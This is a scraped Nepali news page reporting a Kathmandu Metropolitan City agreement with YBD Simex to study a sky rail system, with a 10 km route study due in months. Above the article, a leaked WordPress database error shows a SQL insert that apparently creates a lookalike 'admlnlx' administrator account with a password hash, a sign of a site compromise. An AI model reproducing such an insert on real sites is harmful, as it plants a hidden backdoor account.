WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BehvHGvYFhHxBsDP2lStweym9Mc/Hp0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 18:46:38', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २७-
काठमाडौं महानगरपालिकाले राजधानीमा स्काई रेल सञ्चालनबारे सम्भाव्यता अध्ययन गर्ने भएको छ ।
वाईबीडी साइमेक्स कम्पनी र महानगरपालिकाबीच बुधबार स्काई रेल चलाउने सम्भाव्यता अध्ययन अघि बढाउन द्विपक्षीय समझदारी पत्रमा हस्ताक्षर भएको छ । सम्झौताअनुसार आगामी दुई वर्षभित्र काठमाडौंमा ‘मोनो रेल’ प्रणालीजस्तै स्काई रेल सञ्चालन गरिनेछ ।
साइमेक्सले तीन देखि चार महिनाभित्रै १० किलोमिटरसम्मको रुटमा स्काइरेल चलाउने विषयमा सम्भाव्यता अध्ययन गरेर महानगरपालिकालाई ‘रिपोर्ट’ बुझाउनेछ । काठमाडौंको अधिकांश क्षेत्रको अध्ययन सक्न कम्पनीलाई एक वर्ष लाग्नेछ ।
अध्ययनअनुसार स्काई रेल चलाउन सक्ने देखिए एक वर्षभित्रै सञ्चालनमा आउन सक्ने साइमेक्सका अध्यक्ष प्रसिद्ध पाण्डेको दाबी छ । अन्नपूर्ण पोस्टदैनिकमा खबर छ ।